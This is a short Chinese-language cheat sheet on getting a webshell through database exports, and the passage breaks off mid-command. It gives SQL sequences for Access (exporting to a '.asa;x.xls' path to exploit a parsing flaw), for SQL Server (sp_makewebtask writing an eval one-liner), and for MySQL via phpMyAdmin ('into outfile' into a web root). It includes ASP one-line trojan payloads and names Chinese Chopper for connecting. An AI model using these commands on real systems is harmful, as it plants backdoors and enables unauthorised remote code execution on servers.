数据库命令执行Getshell

Access导出

Access可导出xxx等文件需要配合解析漏洞

create table cmd (a varchar(50));
insert into cmd (a) values ('一句话木马')   #一句话木马如：<%execute request(1)%>
select * into [a] in 'e:\web\webshellcc\1.asa;x.xls' 'excel 4.0;' from cmd 
drop table cmd

菜刀直连https://www.xxx.com/1.asa;x.xls

Sqlserver导出

exec sp_makewebtask 'C:\test1.php','select "<%eval request("pass")%>" '--

Mysql导出

以phpMyAdmin为例

方式一

create TABLE xiaoma (xiaoma1 text NOT NULL);
insert INTO xiaoma (xiaoma1) VALUES('');
select xiaoma1 from xiaoma into outfile 'D:/phpstudy/www/7.php';
drop TABLE IF EXISTS xiaoma;

方法二

select "" into outfile 'D:/phpstudy/www/